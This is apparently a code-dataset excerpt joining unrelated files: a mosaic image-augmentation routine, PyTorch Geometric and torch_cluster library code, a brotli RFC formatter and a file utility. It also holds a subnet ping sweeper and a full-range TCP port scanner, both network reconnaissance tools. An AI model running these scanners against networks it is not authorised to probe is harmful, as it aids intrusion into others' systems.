if x2 >= cutx and x1 <= cutx:
x1 = cutx
if x2-x1 < 5:
continue
if i == 3:
if y1 > cuty or x2 < cutx:
continue
if y2 >= cuty and y1 <= cuty:
y2 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x1 = cutx
if x2-x1 < 5:
continue
tmp_box.append(x1)
tmp_box.append(y1)
tmp_box.append(x2)
tmp_box.append(y2)
tmp_box.append(box[-1])
merge_bbox.append(tmp_box)
return merge_bbox
def get_random_data(annotation_line, input_shape, random=True, hue=.1, sat=1.5, val=1.5, proc_img=True):
'''random preprocessing for real-time data augmentation'''
h, w = input_shape
min_offset_x = 0.4
min_offset_y = 0.4
scale_low = 1-min(min_offset_x,min_offset_y)
scale_high = scale_low+0.2
image_datas = []
box_datas = []
index = 0
place_x = [0,0,int(w*min_offset_x),int(w*min_offset_x)]
    place_y = [0,int(h*min_offset_y),int(h*min_offset_y),0]  # y offsets of the four tiles (based on h, not w)
for line in annotation_line:
        # Split each annotation line
line_content = line.split()
        # Open the image
image = Image.open(line_content[0])
image = image.convert("RGB")
        # Image size
iw, ih = image.size
        # Parse the bounding boxes
box = np.array([np.array(list(map(int,box.split(',')))) for box in line_content[1:]])
# image.save(str(index)+".jpg")
        # Randomly flip the image
flip = rand()<.5
if flip and len(box)>0:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
box[:, [0,2]] = iw - box[:, [2,0]]
        # Rescale the input image
new_ar = w/h
scale = rand(scale_low, scale_high)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw,nh), Image.BICUBIC)
        # Apply colour-space (HSV) jitter
hue = rand(-hue, hue)
sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
val = rand(1, val) if rand()<.5 else 1/rand(1, val)
x = rgb_to_hsv(np.array(image)/255.)
x[..., 0] += hue
x[..., 0][x[..., 0]>1] -= 1
x[..., 0][x[..., 0]<0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x>1] = 1
x[x<0] = 0
image = hsv_to_rgb(x)
image = Image.fromarray((image*255).astype(np.uint8))
        # Paste the image into its quadrant of the mosaic
dx = place_x[index]
dy = place_y[index]
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image)/255
# Image.fromarray((image_data*255).astype(np.uint8)).save(str(index)+"distort.jpg")
index = index + 1
box_data = []
        # Re-map the boxes to the new image
if len(box)>0:
np.random.shuffle(box)
box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
box[:, 0:2][box[:, 0:2]<0] = 0
box[:, 2][box[:, 2]>w] = w
box[:, 3][box[:, 3]>h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w>1, box_h>1)]
box_data = np.zeros((len(box),5))
box_data[:len(box)] = box
image_datas.append(image_data)
box_datas.append(box_data)
img = Image.fromarray((image_data*255).astype(np.uint8))
for j in range(len(box_data)):
thickness = 3
left, top, right, bottom = box_data[j][0:4]
draw = ImageDraw.Draw(img)
for i in range(thickness):
draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
img.show()
    # Cut the four images along the split lines and stitch them together
cutx = np.random.randint(int(w*min_offset_x), int(w*(1 - min_offset_x)))
cuty = np.random.randint(int(h*min_offset_y), int(h*(1 - min_offset_y)))
new_image = np.zeros([h,w,3])
new_image[:cuty, :cutx, :] = image_datas[0][:cuty, :cutx, :]
new_image[cuty:, :cutx, :] = image_datas[1][cuty:, :cutx, :]
new_image[cuty:, cutx:, :] = image_datas[2][cuty:, cutx:, :]
new_image[:cuty, cutx:, :] = image_datas[3][:cuty, cutx:, :]
    # Merge and clip the boxes
new_boxes = merge_bboxes(box_datas, cutx, cuty)
return new_image, new_boxes
def normal_(annotation_line, input_shape):
'''random preprocessing for real-time data augmentation'''
line = annotation_line.split()
image = Image.open(line[0])
box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
iw, ih = image.size
image = image.transpose(Image.FLIP_LEFT_RIGHT)
box[:, [0,2]] = iw - box[:, [2,0]]
return image, box
if __name__ == "__main__":
with open("2007_train.txt") as f:
lines = f.readlines()
a = np.random.randint(0,len(lines))
# index = 0
# line_all = lines[a:a+4]
# for line in line_all:
# image_data, box_data = normal_(line,[416,416])
# img = image_data
# for j in range(len(box_data)):
# thickness = 3
# left, top, right, bottom = box_data[j][0:4]
# draw = ImageDraw.Draw(img)
# for i in range(thickness):
# draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
# img.show()
# # img.save(str(index)+"box.jpg")
# index = index+1
line = lines[a:a+4]
image_data, box_data = get_random_data(line,[416,416])
img = Image.fromarray((image_data*255).astype(np.uint8))
for j in range(len(box_data)):
thickness = 3
left, top, right, bottom = box_data[j][0:4]
draw = ImageDraw.Draw(img)
for i in range(thickness):
draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
img.show()
img.save("box_all.jpg")
``` |
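A tiny worked example of `merge_bboxes` (values chosen by hand): a box in the top-left tile that crosses the vertical cut at `cutx` is clipped to the cut line, while the other tiles are left empty.
```python
# Hand-made check of merge_bboxes: one box in tile 0 crossing cutx=200.
boxes_per_tile = [
    [[150, 50, 260, 120, 0]],  # tile 0 (top-left): x2=260 crosses the cut
    [], [], [],                # tiles 1-3 empty
]
print(merge_bboxes(boxes_per_tile, cutx=200, cuty=200))
# expected output: [[150, 50, 200, 120, 0]]
```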
{
"source": "1308js/NetworkScan",
"score": 3
} |
#### File: 1308js/NetworkScan/network_scan.py
```python
from threading import Thread
import subprocess
from Queue import Queue
import socket, struct, fcntl
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
def get_ip(iface = 'wlan0'):####################function to get the local ip for wireless
ifreq = struct.pack('16sH14s', iface, socket.AF_INET, '\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
ip=get_ip('wlan0')####getting the ip
ip=ip.split('.')
ip=ip[0]+'.'+ip[1]+'.'+ip[2]+'.'####splitting the ip
num_threads = 20
queue = Queue()
#wraps system ping command
##function to check the status of node
def pinger(i, q):
"""Pings subnet"""
while True:
fp=open("result.dat",'a')
ip = q.get()
print "Thread %s: Pinging %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
fp.write(ip+"\n")
else:
print "%s: did not respond" % ip
q.task_done()
#Spawn thread pool
###thread pools
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
#Place work in queue
for i in range(0,256):
ip1=ip+str(i)
queue.put(ip1)
#Wait until worker threads are done to exit
queue.join()
```
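The script above targets Python 2 (`print` statements, the `Queue` module); for reference, a rough Python 3 sketch of the same ping worker and thread pool is given below. The subnet prefix is an assumption for illustration only.
```python
# Rough Python 3 port of the ping worker above (not part of the original script).
import subprocess
from queue import Queue
from threading import Thread

def pinger(i, q):
    while True:
        ip = q.get()
        ret = subprocess.call(["ping", "-c", "1", ip],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.STDOUT)
        print("{}: {}".format(ip, "is alive" if ret == 0 else "did not respond"))
        q.task_done()

queue = Queue()
for i in range(20):
    Thread(target=pinger, args=(i, queue), daemon=True).start()
for i in range(256):
    queue.put("192.168.1.{}".format(i))  # subnet prefix is a placeholder
queue.join()
```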
#### File: 1308js/NetworkScan/port_scan.py
```python
import os
import socket
from concurrent.futures import ThreadPoolExecutor
THREADS = 512
CONNECTION_TIMEOUT = 1
def ping(host, port, results = None):
try:
socket.socket().connect((host, port))
if results is not None:
results.append(port)
print(str(port) + " Open")
file_name=host+'.dat'
f=open(file_name,'a')
f.write(str(port)+"\n")
return True
except:
return False
def scan_ports(host):
available_ports = []
socket.setdefaulttimeout(CONNECTION_TIMEOUT)
with ThreadPoolExecutor(max_workers = THREADS) as executor:
print("\nScanning ports on " + host + " ...")
for port in range(1, 65535):
executor.submit(ping, host, port, available_ports)
print("\nDone.")
available_ports.sort()
print(str(len(available_ports)) + " ports available.")
print(available_ports)
def main():
fp=open("result.dat",'r')
for line in fp:
        print(line.strip())
scan_ports(line.strip())
if __name__ == "__main__":
main()
``` |
{
"source": "130B848/seckill",
"score": 3
} |
#### File: brotli/tools/rfc-format.py
```python
import re
import sys
from subprocess import Popen, PIPE
def Readfile(fn):
f = open(fn, "r")
return f.read()
def FixNroffOutput(buf):
p = re.compile(r'(.*)FORMFEED(\[Page\s+\d+\])$')
strip_empty = False
out = ""
for line in buf.split("\n"):
line = line.replace("\xe2\x80\x99", "'")
line = line.replace("\xe2\x80\x90", "-")
for i in range(len(line)):
if ord(line[i]) > 128:
print >>sys.stderr, "Invalid character %d\n" % ord(line[i])
m = p.search(line)
if strip_empty and len(line) == 0:
continue
if m:
out += p.sub(r'\1 \2\n\f', line)
out += "\n"
strip_empty = True
else:
out += "%s\n" % line
strip_empty = False
return out.rstrip("\n")
def Nroff(buf):
p = Popen(["nroff", "-ms"], stdin=PIPE, stdout=PIPE)
out, err = p.communicate(input=buf)
return FixNroffOutput(out)
def FormatTocLine(section, title, page):
line = ""
level = 1
if section:
level = section.count(".")
for i in range(level):
line += " "
if section:
line += "%s " % section
line += "%s " % title
pagenum = "%d" % page
nspace = 72 - len(line) - len(pagenum)
if nspace % 2:
line += " "
for i in range(nspace / 2):
line += ". "
line += "%d\n" % page
return line
def CreateToc(buf):
p1 = re.compile(r'^((\d+\.)+)\s+(.*)$')
p2 = re.compile(r'^(Appendix [A-Z].)\s+(.*)$')
p3 = re.compile(r'\[Page (\d+)\]$')
found = 0
page = 1
out = ""
for line in buf.split("\n"):
m1 = p1.search(line)
m2 = p2.search(line)
m3 = p3.search(line)
if m1:
out += FormatTocLine(m1.group(1), m1.group(3), page)
elif m2:
out += FormatTocLine(m2.group(1), m2.group(2), page)
elif line.startswith("Authors"):
out += FormatTocLine(None, line, page)
elif m3:
page = int(m3.group(1)) + 1
return out
src = Readfile(sys.argv[1])
out = Nroff(src)
toc = CreateToc(out)
src = src.replace("INSERT_TOC_HERE", toc)
print Nroff(src)
``` |
{
"source": "130ndim/pytorch_cluster",
"score": 3
} |
#### File: pytorch_cluster/torch_cluster/nearest.py
```python
import torch
import scipy.cluster
if torch.cuda.is_available():
import torch_cluster.nearest_cuda
def nearest(x, y, batch_x=None, batch_y=None):
r"""Clusters points in :obj:`x` together which are nearest to a given query
point in :obj:`y`.
Args:
x (Tensor): Node feature matrix
:math:`\mathbf{X} \in \mathbb{R}^{N \times F}`.
y (Tensor): Node feature matrix
:math:`\mathbf{Y} \in \mathbb{R}^{M \times F}`.
batch_x (LongTensor, optional): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example. (default: :obj:`None`)
batch_y (LongTensor, optional): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^M`, which assigns each
node to a specific example. (default: :obj:`None`)
.. testsetup::
import torch
from torch_cluster import nearest
.. testcode::
>>> x = torch.Tensor([[-1, -1], [-1, 1], [1, -1], [1, 1]])
>>> batch_x = torch.tensor([0, 0, 0, 0])
>>> y = torch.Tensor([[-1, 0], [1, 0]])
>>> batch_y = torch.tensor([0, 0])
>>> cluster = nearest(x, y, batch_x, batch_y)
"""
if batch_x is None:
batch_x = x.new_zeros(x.size(0), dtype=torch.long)
if batch_y is None:
batch_y = y.new_zeros(y.size(0), dtype=torch.long)
x = x.view(-1, 1) if x.dim() == 1 else x
y = y.view(-1, 1) if y.dim() == 1 else y
assert x.dim() == 2 and batch_x.dim() == 1
assert y.dim() == 2 and batch_y.dim() == 1
assert x.size(1) == y.size(1)
assert x.size(0) == batch_x.size(0)
assert y.size(0) == batch_y.size(0)
if x.is_cuda:
return torch_cluster.nearest_cuda.nearest(x, y, batch_x, batch_y)
# Rescale x and y.
min_xy = min(x.min().item(), y.min().item())
x, y = x - min_xy, y - min_xy
max_xy = max(x.max().item(), y.max().item())
    x, y = x / max_xy, y / max_xy
# Concat batch/features to ensure no cross-links between examples exist.
x = torch.cat([x, 2 * x.size(1) * batch_x.view(-1, 1).to(x.dtype)], dim=-1)
y = torch.cat([y, 2 * y.size(1) * batch_y.view(-1, 1).to(y.dtype)], dim=-1)
return torch.from_numpy(
scipy.cluster.vq.vq(x.detach().cpu(),
y.detach().cpu())[0]).to(torch.long)
``` |
{
"source": "130ndim/pytorch_geometric",
"score": 2
} |
#### File: test/data/test_sampler.py
```python
import sys
import random
import os.path as osp
import shutil
import torch
from torch.nn.functional import relu
from torch_geometric.utils import erdos_renyi_graph
from torch_geometric.data import Data, NeighborSampler
from torch_geometric.datasets import Planetoid
from torch_geometric.nn.conv import SAGEConv
import torch_geometric.transforms as T
def test_sampler():
num_nodes = 10
data = Data(edge_index=erdos_renyi_graph(num_nodes, 0.1))
data.num_nodes = num_nodes
loader = NeighborSampler(data, size=[4, 0.5], num_hops=2, batch_size=2,
shuffle=True)
for data_flow in loader():
assert data_flow.__repr__()[:8] == 'DataFlow'
assert data_flow.n_id.size() == (2, )
assert data_flow.batch_size == 2
assert len(data_flow) == 2
block = data_flow[0]
assert block.__repr__()[:5] == 'Block'
for block in data_flow:
pass
data_flow = data_flow.to(torch.long)
break
for data_flow in loader(torch.tensor([0, 1, 2, 3, 4])):
pass
loader = NeighborSampler(data, size=[4, 0.5], num_hops=2, batch_size=3,
drop_last=True, shuffle=False,
add_self_loops=True)
for data_flow in loader():
pass
for data_flow in loader(torch.tensor([0, 1, 2, 3, 4])):
pass
mask = torch.tensor([0, 1, 0, 1, 0, 1, 0, 1, 0, 1], dtype=torch.bool)
for data_flow in loader(mask):
pass
def test_cora():
class Net(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super(Net, self).__init__()
self.conv1 = SAGEConv(in_channels, 16)
self.conv2 = SAGEConv(16, 16)
self.conv3 = SAGEConv(16, out_channels)
def forward_data_flow(self, x, edge_weight, data_flow):
block = data_flow[0]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = relu(self.conv1(x, block.edge_index, weight, block.size))
block = data_flow[1]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = relu(self.conv2(x, block.edge_index, weight, block.size))
block = data_flow[2]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = self.conv3(x, block.edge_index, weight, block.size)
return x
def forward(self, x, edge_index, edge_weight):
x = relu(self.conv1(x, edge_index, edge_weight))
x = relu(self.conv2(x, edge_index, edge_weight))
return self.conv3(x, edge_index, edge_weight)
root = osp.join('/', 'tmp', str(random.randrange(sys.maxsize)))
dataset = Planetoid(root, 'Cora')
model = Net(dataset.num_features, dataset.num_classes)
data1 = dataset[0]
data1.edge_weight = None
data2 = T.AddSelfLoops()(dataset[0])
data2.edge_weight = torch.rand(data2.num_edges)
data3 = dataset[0]
loop = torch.stack([torch.arange(100, 200), torch.arange(100, 200)], dim=0)
data3.edge_index = torch.cat([data3.edge_index, loop], dim=1)
data3.edge_weight = None
for data in [data1, data2, data3]:
out_all = model(data.x, data.edge_index, data.edge_weight)
loader = NeighborSampler(data, size=1.0, num_hops=3, batch_size=64,
shuffle=False, drop_last=False,
bipartite=True, add_self_loops=True)
for data_flow in loader(data.train_mask):
out = model.forward_data_flow(data.x[data_flow[0].n_id],
data.edge_weight, data_flow)
assert torch.allclose(out_all[data_flow.n_id], out, atol=1e-06)
loader = NeighborSampler(data, size=1.0, num_hops=3, batch_size=64,
shuffle=False, drop_last=False,
bipartite=False)
for subdata in loader(data.train_mask):
weight = data.edge_weight
weight = None if weight is None else weight[subdata.e_id]
out = model(data.x[subdata.n_id], subdata.edge_index, weight)
out = out[subdata.sub_b_id]
assert torch.allclose(out_all[subdata.b_id], out, atol=1e-06)
shutil.rmtree(root)
```
#### File: nn/conv/message_passing.py
```python
import sys
import inspect
import torch
from torch_geometric.utils import scatter_
special_args = [
'edge_index', 'edge_index_i', 'edge_index_j', 'size', 'size_i', 'size_j'
]
__size_error_msg__ = ('All tensors which should get mapped to the same source '
'or target nodes must be of same size in dimension 0.')
is_python2 = sys.version_info[0] < 3
getargspec = inspect.getargspec if is_python2 else inspect.getfullargspec
class MessagePassing(torch.nn.Module):
r"""Base class for creating message passing layers
.. math::
\mathbf{x}_i^{\prime} = \gamma_{\mathbf{\Theta}} \left( \mathbf{x}_i,
\square_{j \in \mathcal{N}(i)} \, \phi_{\mathbf{\Theta}}
\left(\mathbf{x}_i, \mathbf{x}_j,\mathbf{e}_{i,j}\right) \right),
where :math:`\square` denotes a differentiable, permutation invariant
function, *e.g.*, sum, mean or max, and :math:`\gamma_{\mathbf{\Theta}}`
and :math:`\phi_{\mathbf{\Theta}}` denote differentiable functions such as
MLPs.
See `here <https://pytorch-geometric.readthedocs.io/en/latest/notes/
create_gnn.html>`__ for the accompanying tutorial.
Args:
aggr (string, optional): The aggregation scheme to use
(:obj:`"add"`, :obj:`"mean"` or :obj:`"max"`).
(default: :obj:`"add"`)
flow (string, optional): The flow direction of message passing
(:obj:`"source_to_target"` or :obj:`"target_to_source"`).
(default: :obj:`"source_to_target"`)
"""
def __init__(self, aggr='add', flow='source_to_target'):
super(MessagePassing, self).__init__()
self.aggr = aggr
assert self.aggr in ['add', 'mean', 'max']
self.flow = flow
assert self.flow in ['source_to_target', 'target_to_source']
self.__message_args__ = getargspec(self.message)[0][1:]
self.__special_args__ = [(i, arg)
for i, arg in enumerate(self.__message_args__)
if arg in special_args]
self.__message_args__ = [
arg for arg in self.__message_args__ if arg not in special_args
]
self.__update_args__ = getargspec(self.update)[0][2:]
def propagate(self, edge_index, size=None, dim=0, **kwargs):
r"""The initial call to start propagating messages.
Args:
edge_index (Tensor): The indices of a general (sparse) assignment
matrix with shape :obj:`[N, M]` (can be directed or
undirected).
size (list or tuple, optional): The size :obj:`[N, M]` of the
assignment matrix. If set to :obj:`None`, the size is tried to
get automatically inferred and assumed to be symmetric.
(default: :obj:`None`)
dim (int, optional): The axis along which to aggregate.
(default: :obj:`0`)
**kwargs: Any additional data which is needed to construct messages
and to update node embeddings.
"""
dim = 0
size = [None, None] if size is None else list(size)
assert len(size) == 2
i, j = (0, 1) if self.flow == 'target_to_source' else (1, 0)
ij = {"_i": i, "_j": j}
message_args = []
for arg in self.__message_args__:
if arg[-2:] in ij.keys():
tmp = kwargs.get(arg[:-2], None)
if tmp is None: # pragma: no cover
message_args.append(tmp)
else:
idx = ij[arg[-2:]]
if isinstance(tmp, tuple) or isinstance(tmp, list):
assert len(tmp) == 2
if tmp[1 - idx] is not None:
if size[1 - idx] is None:
size[1 - idx] = tmp[1 - idx].size(dim)
if size[1 - idx] != tmp[1 - idx].size(dim):
raise ValueError(__size_error_msg__)
tmp = tmp[idx]
if tmp is None:
message_args.append(tmp)
else:
if size[idx] is None:
size[idx] = tmp.size(dim)
if size[idx] != tmp.size(dim):
raise ValueError(__size_error_msg__)
tmp = torch.index_select(tmp, dim, edge_index[idx])
message_args.append(tmp)
else:
message_args.append(kwargs.get(arg, None))
size[0] = size[1] if size[0] is None else size[0]
size[1] = size[0] if size[1] is None else size[1]
kwargs['edge_index'] = edge_index
kwargs['size'] = size
for (idx, arg) in self.__special_args__:
if arg[-2:] in ij.keys():
message_args.insert(idx, kwargs[arg[:-2]][ij[arg[-2:]]])
else:
message_args.insert(idx, kwargs[arg])
update_args = [kwargs[arg] for arg in self.__update_args__]
out = self.message(*message_args)
out = scatter_(self.aggr, out, edge_index[i], dim, dim_size=size[i])
out = self.update(out, *update_args)
return out
def message(self, x_j): # pragma: no cover
r"""Constructs messages to node :math:`i` in analogy to
:math:`\phi_{\mathbf{\Theta}}` for each edge in
:math:`(j,i) \in \mathcal{E}` if :obj:`flow="source_to_target"` and
:math:`(i,j) \in \mathcal{E}` if :obj:`flow="target_to_source"`.
Can take any argument which was initially passed to :meth:`propagate`.
In addition, tensors passed to :meth:`propagate` can be mapped to the
respective nodes :math:`i` and :math:`j` by appending :obj:`_i` or
:obj:`_j` to the variable name, *.e.g.* :obj:`x_i` and :obj:`x_j`.
"""
return x_j
def update(self, aggr_out): # pragma: no cover
r"""Updates node embeddings in analogy to
:math:`\gamma_{\mathbf{\Theta}}` for each node
:math:`i \in \mathcal{V}`.
Takes in the output of aggregation as first argument and any argument
which was initially passed to :meth:`propagate`."""
return aggr_out
```
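A minimal sketch of a custom layer built on the `MessagePassing` base class above; the layer name, feature sizes and random graph are illustrative only, not part of the library.
```python
import torch
from torch.nn import Linear

class SimpleConv(MessagePassing):
    # Hypothetical example layer: mean-aggregates linearly transformed neighbour features.
    def __init__(self, in_channels, out_channels):
        super(SimpleConv, self).__init__(aggr='mean')
        self.lin = Linear(in_channels, out_channels)

    def forward(self, x, edge_index):
        # x: [N, in_channels], edge_index: [2, E]
        return self.propagate(edge_index, size=(x.size(0), x.size(0)), x=x)

    def message(self, x_j):
        # x_j holds the features of the source node of every edge
        return self.lin(x_j)

conv = SimpleConv(16, 32)
out = conv(torch.randn(10, 16), torch.randint(0, 10, (2, 40)))  # -> [10, 32]
```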
#### File: torch_geometric/nn/meta.py
```python
import torch
class MetaLayer(torch.nn.Module):
r"""A meta layer for building any kind of graph network, inspired by the
`"Relational Inductive Biases, Deep Learning, and Graph Networks"
<https://arxiv.org/abs/1806.01261>`_ paper.
A graph network takes a graph as input and returns an updated graph as
output (with same connectivity).
The input graph has node features :obj:`x`, edge features :obj:`edge_attr`
as well as global-level features :obj:`u`.
The output graph has the same structure, but updated features.
Edge features, node features as well as global features are updated by
calling the modules :obj:`edge_model`, :obj:`node_model` and
:obj:`global_model`, respectively.
To allow for batch-wise graph processing, all callable functions take an
additional argument :obj:`batch`, which determines the assignment of
edges or nodes to their specific graphs.
Args:
edge_model (Module, optional): A callable which updates a graph's edge
features based on its source and target node features, its current
edge features and its global features. (default: :obj:`None`)
node_model (Module, optional): A callable which updates a graph's node
features based on its current node features, its graph
connectivity, its edge features and its global features.
(default: :obj:`None`)
global_model (Module, optional): A callable which updates a graph's
global features based on its node features, its graph connectivity,
its edge features and its current global features.
.. code-block:: python
from torch.nn import Sequential as Seq, Linear as Lin, ReLU
from torch_scatter import scatter_mean
from torch_geometric.nn import MetaLayer
class EdgeModel(torch.nn.Module):
def __init__(self):
super(EdgeModel, self).__init__()
self.edge_mlp = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, src, dest, edge_attr, u, batch):
# source, target: [E, F_x], where E is the number of edges.
# edge_attr: [E, F_e]
# u: [B, F_u], where B is the number of graphs.
# batch: [E] with max entry B - 1.
out = torch.cat([src, dest, edge_attr, u[batch]], 1)
return self.edge_mlp(out)
class NodeModel(torch.nn.Module):
def __init__(self):
super(NodeModel, self).__init__()
self.node_mlp_1 = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
self.node_mlp_2 = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, x, edge_index, edge_attr, u, batch):
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
row, col = edge_index
out = torch.cat([x[row], edge_attr], dim=1)
out = self.node_mlp_1(out)
out = scatter_mean(out, col, dim=0, dim_size=x.size(0))
out = torch.cat([x, out, u[batch]], dim=1)
return self.node_mlp_2(out)
class GlobalModel(torch.nn.Module):
def __init__(self):
super(GlobalModel, self).__init__()
self.global_mlp = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, x, edge_index, edge_attr, u, batch):
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
out = torch.cat([u, scatter_mean(x, batch, dim=0)], dim=1)
return self.global_mlp(out)
op = MetaLayer(EdgeModel(), NodeModel(), GlobalModel())
x, edge_attr, u = op(x, edge_index, edge_attr, u, batch)
"""
def __init__(self, edge_model=None, node_model=None, global_model=None):
super(MetaLayer, self).__init__()
self.edge_model = edge_model
self.node_model = node_model
self.global_model = global_model
self.reset_parameters()
def reset_parameters(self):
for item in [self.node_model, self.edge_model, self.global_model]:
if hasattr(item, 'reset_parameters'):
item.reset_parameters()
def forward(self, x, edge_index, edge_attr=None, u=None, batch=None):
""""""
row, col = edge_index
if self.edge_model is not None:
edge_attr = self.edge_model(x[row], x[col], edge_attr, u,
batch if batch is None else batch[row])
if self.node_model is not None:
x = self.node_model(x, edge_index, edge_attr, u, batch)
if self.global_model is not None:
u = self.global_model(x, edge_index, edge_attr, u, batch)
return x, edge_attr, u
def __repr__(self):
return ('{}(\n'
' edge_model={},\n'
' node_model={},\n'
' global_model={}\n'
')').format(self.__class__.__name__, self.edge_model,
self.node_model, self.global_model)
```
#### File: torch_geometric/utils/subgraph.py
```python
import torch
from .num_nodes import maybe_num_nodes
def subgraph(subset, edge_index, edge_attr=None, relabel_nodes=False,
num_nodes=None):
r"""Returns the induced subgraph of :obj:`(edge_index, edge_attr)`
containing the nodes in :obj:`subset`.
Args:
subset (LongTensor, BoolTensor or [int]): The nodes to keep.
edge_index (LongTensor): The edge indices.
edge_attr (Tensor, optional): Edge weights or multi-dimensional
edge features. (default: :obj:`None`)
relabel_nodes (bool, optional): If set to :obj:`True`, the resulting
:obj:`edge_index` will be relabeled to hold consecutive indices
starting from zero. (default: :obj:`False`)
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
:rtype: (:class:`LongTensor`, :class:`Tensor`)
"""
if isinstance(subset, list) or isinstance(subset, tuple):
subset = torch.tensor(subset, dtype=torch.long)
if subset.dtype == torch.bool or subset.dtype == torch.uint8:
n_mask = subset
if relabel_nodes:
n_idx = torch.zeros(n_mask.size(0), dtype=torch.long)
n_idx[subset] = torch.arange(subset.sum().item())
else:
num_nodes = maybe_num_nodes(edge_index, num_nodes)
n_mask = torch.zeros(num_nodes, dtype=torch.bool)
n_mask[subset] = 1
if relabel_nodes:
n_idx = torch.zeros(num_nodes, dtype=torch.long)
n_idx[subset] = torch.arange(subset.size(0))
mask = n_mask[edge_index[0]] & n_mask[edge_index[1]]
edge_index = edge_index[:, mask]
edge_attr = edge_attr[mask] if edge_attr is not None else None
if relabel_nodes:
edge_index = n_idx[edge_index]
return edge_index, edge_attr
``` |
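A small usage sketch of the helper above, with values chosen by hand to show the clipping and relabeling behaviour:
```python
import torch

# Keep nodes {0, 2, 3} of a 4-node ring graph.
edge_index = torch.tensor([[0, 1, 2, 3],
                           [1, 2, 3, 0]])
edge_attr = torch.tensor([1.0, 2.0, 3.0, 4.0])

sub_edge_index, sub_edge_attr = subgraph([0, 2, 3], edge_index, edge_attr,
                                         relabel_nodes=True, num_nodes=4)
# Only edges with both endpoints in the subset survive: (2, 3) and (3, 0),
# relabeled to (1, 2) and (2, 0); their attributes are [3.0, 4.0].
print(sub_edge_index, sub_edge_attr)
```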
{
"source": "130s/10sqft_hut",
"score": 3
} |
#### File: src/hut_10sqft/util.py
```python
import datetime
import fileinput
import fnmatch
import glob
import os
import re
import subprocess
import sys
import time
class Util:
@staticmethod
def find_all_files(path='.', filename_pattern='*', ret_relativepath=False,
depth_max=3):
'''
http://stackoverflow.com/questions/1724693/find-a-file-in-python
@param path: (str) Top level path to search.
@param filename_pattern: Full file name or pattern to be found.
@type filename_pattern: str
@param ret_relativepath: If True, returned file paths will be in
relative to the "path" arg.
e.g. ['file1', 'currentdir/file2']
@param depth_max: If 0 traverse until the program ends
(not tested well so NOT recommended).
@type depth_max: int
@return: List of absolute path of the files.
'''
filepaths_matched = []
_filenames = []
if depth_max == 0:
print('when depth_max=0: Search path: {},'
' abspath: {}'.format(path, os.path.abspath(path)))
for root, dirnames, filenames in os.walk(path):
# When one or more file exists in a dir.
if len(filenames):
for filename in filenames:
_filenames.append(os.path.join(root, filename))
else:
for depth in range(depth_max):
# Remove the last '/' to match files, not dir.
regex_depths = ('*/' * depth)[:-1]
_filenames.extend(glob.glob(regex_depths))
print('At depth {} regex_depths: {}\n\t_filenames at the'
' moment: {}'.format(depth, regex_depths, _filenames))
# print('DEBUG) filename_pattern: {}'.format(filename_pattern))
print('Depth_max: {} num of found files: {}'.format(
depth_max, len(_filenames)))
for filename in fnmatch.filter(_filenames, filename_pattern):
if os.path.isdir(filename):
continue
if ret_relativepath:
filepaths_matched.append(filename)
else:
filepaths_matched.append(os.path.abspath(filename))
if 0 < depth_max:
# This could print infinitely many files so better limit.
print('[find_all_files]: matched files: {}'.format(filepaths_matched))
return filepaths_matched
@staticmethod
def replaceAll(file, searchExp, replaceExp):
'''
http://stackoverflow.com/questions/39086/search-and-replace-a-line-in-a-file-in-python
Example usage:
replaceAll("/fooBar.txt","Hello\sWorld!$","Goodbye\sWorld.")
'''
for line in fileinput.input(file, inplace=1):
if searchExp in line:
line = line.replace(searchExp, replaceExp)
sys.stdout.write(line)
@staticmethod
def replace(filename, pattern, subst):
'''
Replace string in a single file.
RegEx capable.
Originally taken from http://stackoverflow.com/a/13641746/577001
@param pattern: Regular expression of the pattern of strings to be
replaced.
@param subst: Exact string to be replaced with.
@raise IOError: When the entity of filename not available.
'''
# Read contents from filename as a single string
try:
with open(filename, 'r') as file_handle:
file_string = file_handle.read()
file_handle.close()
except IOError as e:
print("Could not read file '{}'".format(filename))
raise e
# Use RE package to allow for replacement (also allowing for (multiline) REGEX)
